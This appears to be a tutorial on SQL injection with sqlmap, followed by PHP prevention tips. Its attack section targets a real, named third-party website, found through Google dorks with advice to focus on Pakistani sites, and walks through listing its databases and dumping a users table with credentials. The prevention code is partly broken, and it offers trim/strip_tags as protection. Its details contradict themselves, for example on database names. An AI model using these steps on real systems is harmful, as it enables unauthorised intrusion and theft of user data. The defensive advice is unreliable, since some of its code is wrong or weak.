WEB APPLICATION PENETRATION TESTING:-USING SQL INECTION

SQL injection
is an application security weakness that allows attackers to control an application’s database –
letting them access or delete data, change an application’s data-driven behavior, and do other
undesirable things – by tricking the application into sending unexpected SQL commands.
SQL injection weaknesses occur when an application uses untrusted data, such as data entered
into web form fields, as part of a database query. When an application fails to properly sanitize
this untrusted data before adding it to a SQL query, an attacker can include their own SQL
commands which the database will execute. Such SQLi vulnerabilities are easy to prevent, yet
SQLi remains a leading web application risk, and many organizations remain vulnerable to
potentially damaging data breaches resulting from SQL injection.

SQL injection is a code injection technique, used to attack data-driven applications. The SQL
Injection attack allows external users to read details from the database, so attackers can
dump whole website database and find admin username/password details.
Note: Unfortunately we CANNOT PERFORM SQLi attack on all websites. The websites need a SQLi
vulnerability in order to do this technique. Website URL www.example.com/page.php? need a
parameter like php?id=4 / php?id=any number to inject.
TOOLS USED

 Sqlmap

 Kali linux operating system

 Target website url http://www.ffo.org.pk/gallery.php?c=10

 To Find these type of website, Use Google Dorks- dork will advance
search on google

 There is no limit in dork list, you can make your own google dork
with keywords. Or you search on google for "New Google Dorks
List" you will get many results.

 Note: You can search other country website too using google
dorks. if you like to do this to Pakistan based websites ADD site:.pk
at the end of the dork for example:

 I found a website http://www.ffo.org.pk/gallery.php?c=10

PERFORMING SQL INJECTION ATTACK

 Open the kali linux terminal in kali linux operating system.

 Write the command sqlmap.

 To test for this, we use SQLMAP. To look at the set of parameters that
can be passed, type in the terminal,

 Sqlmap –h
Using SQLMAP to test a website for SQL Injection vulnerability:

1.STEP 1: List information about the target web app database

So firsty , we have to enter the target url that we want to check along with the –u
parameter. Now typically, we would want to test whether it is possible to gain access to
a database. So we use the –dbs option to do so. –dbs lists all the available databases.

 Sqlmap –u http://www.ffo.org.pk/gallery.php?c=10 –-dbs

We observe that their are two databases, acuart and information_schema

2. Step 2: List information about Tables present in a particular Database

To try and access any of the databases, we have to slightly modify our command. We
now use -D to specify the name of the database that we wish to access, and once we
have access to the database, we would want to see whether we can access the tables.
For this, we use the –tables query. Let us access the acuart database.

 Sqlmap –u http://www.ffo.org.pk/gallery.php?c=10 –D generic2_ffoweb --tables

In the above picture, we see that 24 tables have been retrieved. So now we definitely
know that the website is vulnerable.

3. Step 3: List information about the columns of a particular table

If we want to view the columns of a particular table, we can use the following command,
in which we use -T to specify the table name, and –columns to query the column
names. We will try to access the table tblusers

Sqlmap –u www.ffo.org.pk/gallery.php?c=10 –D generic2_ffoweb –T tblusers

4. Step 4: Dump the data from the columns

Similarly, we can access the information in a specific column by using the following
command, where the –dump query retrieves the data
Sqlmap –u www.ffo.org.pk/gallery.php?c=10 –D generic2_ffoweb –T tblusers -
-dump
From the above picture, we can see that we have accessed the data from
the database. Similarly, in such vulnerable websites, we can literally
explore through the databases to extract information

SQL INJECTION PREVENTION

There Are Four Ways To Prevent SQL injection:

1. Using Prepared Statement .

The most easiest way to prevent SQL Injection Attacks in PHP is
to use ‘Prepared Statements’. So, here’s how we can use the
prepared statements for making the above database query.
<?php
$username = $_POST["username"];
$password = $_POST["password"];
$stmt = $mysqli->prepare("SELECT FROM login WHERE user=? AND
pass=?");
$stmt->mysqli_bind_param("ss",$username,$password);
$stmt->execute();
$stmt->close();
$mysqli->close();
?>

What happens is that the SQL statement you pass to prepare is parsed
and compiled by the database server. By specifying parameters (either a
? or a named parameter like :username (in case of PDO) you tell the
database engine where you want to filter on. Then when you call
execute, the prepared statement is combined with the parameter
values you specify.

2.Escaping String
Escaping string helps in removing special characters for use in
SQL statements. It also takes into account current charset of
the connection.

<?php
$username = mysqli_real_escape_string($conn,$_POST["username"]);

$password = mysqli_real_escape_string($conn,$_POST["password"]);
mysqli_close($conn);

?>

3.Using trim() and strip_tags()

trim() and strip_tags() are the conventional ways to filtering
your input. trim() is used for removing whitespaces from the
beginning and end of a string. strip_tags() is used for stripping
HTML and PHP tags.
Both of them together can help in removing additional codes and
spaces generally used by hackers.
Here’s how you can have a code like this.
<?php
$username = strip_tags(trim($_POST["username"]));
$password = strip_tags(trim($_POST["password"]))

?>
4. Using PDO
PDO or PHP Data Objects are very useful – probably the most
effective in preventing SQL Injection Attacks. PDO also uses
prepared statements and binds values at runtime.
For PDO, you can have a code like this :

$stmt = db::con()->prepare("SELECT * FROM table WHERE id=?

AND name=?");
$stmt->bindValue(1, $id, PDO::PARAM_INT);
$stmt->bindValue(2, $name, PDO::PARAM_STR);
$stmt->execute();
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);